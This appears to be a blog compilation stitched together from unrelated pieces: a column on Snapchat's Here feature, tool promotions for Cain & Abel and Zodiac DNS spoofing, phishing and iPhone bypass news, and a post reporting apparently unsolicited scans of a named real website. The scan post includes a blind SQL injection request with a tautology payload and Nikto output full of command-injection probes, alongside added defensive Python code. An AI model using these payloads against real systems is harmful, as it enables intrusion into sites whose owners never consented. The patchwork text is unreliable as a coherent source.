Snap Chat Vulnerabilities

Snapchat’s latest feature shows why IT must tame marketing’s inner monster

By Evan Schuman, Computerworld

Marketing has gone gaga over social media. (Come to think of it, gaga may be marketing’s default state.) Marketers being who they are, they are trying to figure out ways to use social media to control consumers and bend them to their will. As they seek to do that, they will look to IT to make their visions reality. It’s up to the adults in IT to inject some rationality into those discussions.

What brings this to mind is an interesting and deliriously over-the-top feature announced by Snapchat on May 1 and called simply Here. The intent of the program is innocuous enough. It’s supposed to allow people to pop up on your mobile screen without the phone ringing and — here’s the tricky part — without you agreeing to it. If you have ever seen marketers in action, you can probably see why I think this will appeal to them.

The video that Snapchat made shows how the program would work when everything goes perfectly. And it indeed looks like an attractive feature if you buy into Snapchat’s assumptions about how people should interact. As a Business Insider piece described it: “It’s all part of Snapchat’s strategy called ‘Here,’ which strives to make all users feel like their friends are constantly present and attentive.”

The catch is that friends — especially the rather all-encompassing definition of friends adopted by users of Snapchat and other social media — are in fact not constantly present and attentive. What better way to drive that point home than to force people to make a binary choice: interact with me now or not at all?

Snapchat differentiated its original photo-messaging service with its Mission: Impossible twist: photos and videos vanished 10 seconds after they were viewed by the recipient. The Here feature introduces social risks, though. With the original service, you sent an image, and if it was ignored, no one was insulted. But the more personal and real-time the conversation attempt, the more insulting it will feel when it’s ignored or rejected. Bizarrely enough, this is why email is arguably the most polite of communication methods. You can send an email whenever it suits you, and it quietly and politely waits until the recipient has the time to deal with it. With Here, you show up on the recipient’s screen instantly, and the recipient is either going to start to talk to you right then or just swipe you away into non-existence. Ouch!

Here’s the IT headache. This is going to plant ideas into the heads of your marketing counterparts. “Gee, I’d love to be able to pop up on the screens of our customers whenever I want. Make that happen, IT. Of course you can do it. Snapchat’s already done it.” (As a grown-up, you will want to resist the urge to respond, “And if Facebook jumped off the Empire State Building . . . ?”)

Most people have a bit of niceness and politeness inside of them. It’s socialized into us as we learn to avoid being rejected a lot. Marketers, though, seem to have no fear of rejection. Only they could routinely send out hundreds of thousands of emails and be thrilled with a 1% response rate. The prospect of being turned down again and again via an instant video-communication app is not going to faze them.

This is why, when I heard about Here, I thought about how dangerous it could be in the hands of the marketing department. People who have no compunction about telephoning millions of people during the dinner hour are not going to resist a technology that will let them instantly show up on the phones of customers, even though those customers might get annoyed if they are driving, going to the bathroom or just watching TV. If their conscience won’t stop them, you need to. Sorry, but there’s a price for having grown up.

Evan Schuman has covered IT issues for a lot longer than he’ll ever admit. The founding editor of retail technology site StorefrontBacktalk, he’s been a columnist for CBSNews.com, RetailWeek and eWeek. Evan can be reached at eschuman@thecontentfirm.com and he can be followed at twitter.com/eschuman. Look for his column every Tuesday.


Originally published on Computerworld.

Vulnerability found in http://ncc.co.uk

Info first

root@bt:/pentest/enumeration/web/whatweb# ./whatweb ncc.c
http://ncc.co.uk [200] Cookies[ncc], Email[info@ncc.co.uk], Google-Analytics[UA-11579552-1], Title[National Computing Centre  | Home], PHP[5.2.17], JQuery, X-Powered-By[PHP/5.2.17], Country[UNITED KINGDOM][GB], Apache, HTTPServer[Apache], IP[88.98.24.202]

The index.php response header contains an Expires date that is long past:

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 11 Sep 2012 03:02:58 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="content-language" content="en" />
var url_address = "http://ncc.co.uk/";

Blind SQLi in captcha!

During a few scans with BackTrack, here's a vulnerability I found in their site. This first one sits on http://ncc.co.uk/index.php/index.php in the captcha token.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Exported HTTP Request from W3AF</title>
</head>
<body><form action="http://ncc.co.uk/index.php" method="POST">
<label>website</label>
<input type="text" name="website" value="http://w3af.sf.net/">
<label>comment</label>
<input type="text" name="comment" value="Hi hunny I'm home">
<label>firstname</label>
<input type="text" name="firstname" value="John">
<label>lastname</label>
<input type="text" name="lastname" value="Smith">
<label>company</label>
<input type="text" name="company" value="Bonsai">
<label>telephone</label>
<input type="text" name="telephone" value="55550178">
<label>captcha</label>
<input type="text" name="captcha" value="84" OR "84"="84">
<label>postcode</label>
<input type="text" name="postcode" value="55550178">
<label>address</label>
<input type="text" name="address" value="Bonsai Street 123">
<label>Accreditation_4_action</label>
<input type="text" name="Accreditation_4_action" value="submit">
<label>form</label>
<input type="text" name="form" value="4">
<label>title</label>
<input type="text" name="title" value="">
<label>jobtitle</label>
<input type="text" name="jobtitle" value="Hunter">
<label>email</label>
<input type="text" name="email" value="w3af@techsupportbase.net">
<label>mode</label>
<input type="text" name="mode" value="56">
<label>captcha_token</label>
<input type="text" name="captcha_token" value="4e49734857717649364c72367738453d">
<label>page</label>
<input type="text" name="page" value="689">
<input type="submit">
</form>
</body>
</html>
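The tautology in the captcha field above (`84" OR "84"="84`) only has an effect if the server pastes the submitted value into its SQL text. The following Python is an added example, not the site's code: a constructed in-memory captcha table (SQLite stands in for the MySQL backend assumed behind PHP 5.2.17, and because the example's vulnerable query delimits with single quotes, the same tautology is shown with single quotes), the concatenating check beside a parameterised one, and a log-side regex that flags the pattern in either quote style.

```python
import re
import sqlite3

TOKEN = "4e49734857717649364c72367738453d"   # captcha_token from the exported request
ANSWER = "17"                                 # constructed: the stored captcha solution
PAYLOAD_DQ = '84" OR "84"="84'                # the payload from the request (MySQL-style quoting)
PAYLOAD_SQ = "84' OR '84'='84"                # same tautology for single-quote delimiters


def make_db():
    """Constructed in-memory stand-in for the site's captcha store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE captcha (token TEXT PRIMARY KEY, answer TEXT)")
    conn.execute("INSERT INTO captcha VALUES (?, ?)", (TOKEN, ANSWER))
    conn.commit()
    return conn


def captcha_ok_vulnerable(conn, token, answer):
    """Concatenates the submitted answer into the SQL text: the bug class reported above."""
    sql = ("SELECT COUNT(*) FROM captcha WHERE token = '%s' AND answer = '%s'"
           % (token, answer))
    # AND binds tighter than OR, so an injected OR '84'='84' makes the WHERE always true.
    return conn.execute(sql).fetchone()[0] > 0


def captcha_ok_fixed(conn, token, answer):
    """Bound parameters: the answer is passed as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT COUNT(*) FROM captcha WHERE token = ? AND answer = ?",
        (token, answer),
    ).fetchone()
    return row[0] > 0


# Detection side: a quote, OR, and a value compared with itself, in either quote style.
TAUTOLOGY = re.compile(r"""['"]\s*OR\s*['"]?(\w+)['"]?\s*=\s*['"]?\1['"]?""",
                       re.IGNORECASE)


def looks_like_tautology(value):
    """True when a submitted form value carries an always-true OR comparison."""
    return TAUTOLOGY.search(value) is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable check with payload:", captcha_ok_vulnerable(db, TOKEN, PAYLOAD_SQ))
    print("fixed check with payload     :", captcha_ok_fixed(db, TOKEN, PAYLOAD_SQ))
    print("flagged:", looks_like_tautology(PAYLOAD_DQ), looks_like_tautology("Hi hunny I'm home"))
```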

Nikto reported 19 items as suspected vulnerabilities:

root@bt:/pentest/web/nikto# ./nikto.pl -h http://ncc.co.uk
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          88.98.24.202
+ Target Hostname:    ncc.co.uk
+ Target Port:        80
+ Start Time:         2012-09-10 21:17:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ robots.txt contains 2 entries which should be manually viewed.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-17664: /_mem_bin/remind.asp: Page will give the password reminder for any user requested (username must be known).
+ OSVDB-724: /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ OSVDB-724: /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /certificates: This might be interesting...
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'
+ OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ 6474 items checked: 64 error(s) and 19 item(s) reported on remote host
+ End Time:           2012-09-10 22:14:47 (GMT-4) (3438 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
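Nineteen reported items are not nineteen distinct weaknesses: Nikto fires every signature it has, reports each matching path as its own line, and keeps probing IIS-only paths on an Apache/PHP host. The Python below is an added example (not part of Nikto or of the write-up) that groups the OSVDB findings by id and marks ids whose probed path belongs to another platform as needing manual confirmation before they go into a report; the sample lines are copied from the scan output above, and the platform markers are a heuristic chosen for this example.

```python
import re
from collections import defaultdict

# Sample lines copied from the Nikto output above (an excerpt of that scan, not a new one).
NIKTO_OUTPUT = """\
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ OSVDB-17664: /_mem_bin/remind.asp: Page will give the password reminder for any user requested (username must be known).
+ OSVDB-724: /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ OSVDB-724: /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ 6474 items checked: 64 error(s) and 19 item(s) reported on remote host
"""

FINDING = re.compile(r"^\+ OSVDB-(\d+): (\S+): (.*)$")
POWERED_BY = re.compile(r"^\+ Retrieved x-powered-by header: (.*)$")

# Path fragments that only make sense on a platform other than PHP on Apache.
# Heuristic picked for this example; extend per engagement.
FOREIGN_PLATFORM_MARKERS = (".asp", "/_mem_bin/")


def parse_nikto(text):
    """Return (x-powered-by value or None, {osvdb_id: {'paths': [...], 'desc': str}})."""
    powered_by = None
    findings = defaultdict(lambda: {"paths": [], "desc": ""})
    for line in text.splitlines():
        m = POWERED_BY.match(line)
        if m:
            powered_by = m.group(1)
            continue
        m = FINDING.match(line)
        if m:
            osvdb, path, desc = m.groups()
            findings[osvdb]["paths"].append(path)   # one id, possibly many probed paths
            findings[osvdb]["desc"] = desc
    return powered_by, dict(findings)


def platform_mismatches(powered_by, findings):
    """OSVDB ids whose probed paths target a platform other than the fingerprinted PHP stack."""
    if not powered_by or not powered_by.startswith("PHP"):
        return []
    flagged = [osvdb for osvdb, f in findings.items()
               if any(marker in p.lower() for p in f["paths"]
                      for marker in FOREIGN_PLATFORM_MARKERS)]
    return sorted(flagged)


def triage(text):
    """Map each OSVDB id to 'verify-manually' (platform mismatch) or 'review'."""
    powered_by, findings = parse_nikto(text)
    mismatched = set(platform_mismatches(powered_by, findings))
    return {osvdb: ("verify-manually" if osvdb in mismatched else "review")
            for osvdb in findings}


if __name__ == "__main__":
    stack, found = parse_nikto(NIKTO_OUTPUT)
    print(stack, "->", sum(len(f["paths"]) for f in found.values()), "lines,",
          len(found), "distinct OSVDB ids")
    print(triage(NIKTO_OUTPUT))
```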


Cain & Abel v4.9.35 – Password Sniffer, Cracker and Brute-Forcing Tool

It’s been quite a while since we’ve written about Cain & Abel, one of the most powerful tools for the Windows platform.

Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects and weaknesses present in protocol standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, but it also ships some “non standard” utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration testers and everyone else who plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damage and/or loss of data using this software, and that in no event shall the author be liable for such damage or loss of data. Please carefully read the License Agreement included in the program before using it.

The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.

The most recent addition is support for Windows 2008 Terminal Server in the APR-RDP sniffer filter.

You can download Cain & Abel v4.9.35 here:

ca_setup.exe

Or read more here; the online user manual is here.

Internet Security

You will be trading a bit of convenience for your increase in privacy. How many steps you take, and on which occasion you take them will depend on your degree of trust 🙂

1. cookies – by disabling persistent cookies, you can prevent a website (or network of websites) to track your browsing pattern across multiple sessions. Each time you close your browser, any cookies you have received will be deleted. The main drawback is that this will disable any website auto-logins or specific settings you may have enabled.

2. toolbars – assistants, helpers and other gimmicks that you might want to install as a browser toolbar will periodically phone home while you are surfing the web. Some of this may be legit, some of it may not.

3. websites that you register for – Social networking sites or webmail services may be interested in following your activities while you browse their site. Which topics interest you, what opinions did you express, did you make any purchases?

4. geolocation of your ip address – great for targeted advertising, or to display varied content (e.g. languages) depending on a user’s location. You could consider using a proxy that does not relay your original ip address.

5. data harvesting at the ISP level – search for Phorm, Nebuad, Carnivore 😉

The list could go on for a while; many others can comment on the other breaches of security like… Flash cookies, user agents, hop counts, private browsing, browser anti-phishing features, omnibox, anonymizers, hosts file anyone?

Watch your password!

Microsoft confirmed yesterday evening that the popular web email service, Hotmail, had been targeted by malicious fraudsters in what is commonly referred to as a phishing scam, tricking users into revealing their credentials at fake websites.
Neowin can today reveal that more lists are circulating with genuine account information and that over 20,000 accounts have now been compromised. Non-Hotmail passport accounts have been affected too. A new list contains email accounts for Gmail, Yahoo, Comcast, Earthlink and other third party popular web mail services. It’s not clear if this is login information for the service itself or the Microsoft Passport passwords.
Microsoft confirmed Neowin’s exclusive report yesterday evening and issued a statement on a company blog:
“Over the weekend Microsoft learned that several thousand Windows Live Hotmail customer’s credentials were exposed on a third-party site due to a likely phishing scheme. Upon learning of the issue, we immediately requested that the credentials be removed and launched an investigation to determine the impact to customers. As part of that investigation, we determined that this was not a breach of internal Microsoft data and initiated our standard process of working to help customers regain control of their accounts.”
It’s clear the lists are the result of a phishing scam and some commenters at Neowin suggest it could be the result of unwitting users sending their credentials to sites that name who has blocked you on popular instant messaging software Windows Live Messenger.
Neowin has once again reported the new lists to Microsoft’s Security Response Center and can confirm that the lists originated from pastebin.com, a site commonly used by developers to share code snippets. Pastebin owner Paul Dixon confirmed that the site was down for maintenance due to “an unprecedented amount of traffic” after our initial reports. Dixon stated “Pastebin.com is just a fun side project for me, and today it’s not fun. It will remain offline all day while I make some further modifications.”
Update: The phishing attack has spread to Google Mail and Yahoo mail amongst others, we’re currently awaiting full confirmation on the number of accounts at each service. BBC News is reporting that Google have confirmed the phishing attack.

Phone Password Flaw Discovered

The Apple iPhone password that’s used to protect personal information can be easily circumvented, according to users.

Circumventing the password involves the use of the device’s "emergency call" keypad and amounts to only a couple of taps on the iPhone’s multitouch screen, according to reports of the flaw on the forum of the MacRumors Web site.

Once the emergency call keypad is accessed through the passcode entry screen, a person only needs to double tap the home button, which takes the user to the iPhone’s favorites section. From there, a person gets full access to the device, including applications, contact lists, and e-mail.

The apparent flaw, however, has a simple fix. Through the iPhone’s "settings" option, a person only has to disable double tapping on the home button to make the device secure once again, users reported.

Apple did not respond to a request for comment.

iPhone security is a key issue in use of the device on corporate networks. Getting businesses to adopt the iPhone was a major focus in Apple’s release of version 2.0 of the iPhone operating system over the summer. Find out what 2,000 IT professionals told InformationWeek about their plans and priorities for securing their companies’ assets. Download the report here (registration required).

Nevertheless, security issues have arisen with use of the iPhone. InformationWeek, for example, reported potential security problems in using Apple’s tools for creating custom configuration files that can be used to provision large numbers of iPhones on an enterprise environment.

In addition, the iPhone Mail and Safari applications in July were found to be vulnerable to URL spoofing. Security researcher Aviv Raff reported the problem and recommended that users not click on links to get to trusted sites, like online banks; but rather type URLs in manually until the problem is resolved.

Raff has criticized Apple for its handling of Safari security, saying the company has failed to learn from past browser design mistakes.

Zodiac Spoofing


Zodiac is a DNS protocol analysis and exploitation program. It is a robust tool to explore the DNS protocol. Internally it contains advanced routines for DNS packet construction and disassembly, and it is the optimal tool if you just want to try something out without the hassle of rewriting DNS packet routines or packet filtering.

Features

  • sniffing on all kinds of configured devices (Ethernet, PPP, …)
  • capturing and decoding nearly all types of DNS packets, including packet decompression
  • ncurses driven text based frontend with interactive commanding and multiple windows
  • threaded design allows more flexibility when adding your own features
  • clean code, commented and tested just fine, ready for you to extend
  • internal DNS packet filtering allows installation of pseudo DNS filters you can “select()” on
  • a large set of DNS packet construction primitives
  • DNS name server versioning using BIND version requests
  • DNS local spoofing, answering DNS queries on your LAN before the remote NS
  • DNS jazz spoofing, exploiting a weakness within old BIND versions
  • DNS ID spoofing, exploiting a weakness within the DNS protocol itself

You can download Zodiac 0.4.9 here:

zodiac-0.4.9.tar.gz

Or read more here.


Hot Safety solutions

Hi people, how’s everyone doing? Well, I’ve been a bit busy and a few people wanted help with problems like "how do I get rid of this virus?" or "check for bugs?" Well, we can do without the small talk and expand our minds to more important things in computer life! But you just need to remember to keep up with checks and hold the appropriate software on your system, like Avast and CCleaner, and also a good anti-spyware like SpyBot, but it is great to have these online too, Error Doctor and AdaWareBot. Also please look into updates of viruses and trojans, see what feeds are available (these will save you time) and check your Registry for these, because there is always a possibility of infection, even on a flash drive! You can schedule scans in these programs on your computer to make it as easy as possible to keep your system CLEAN.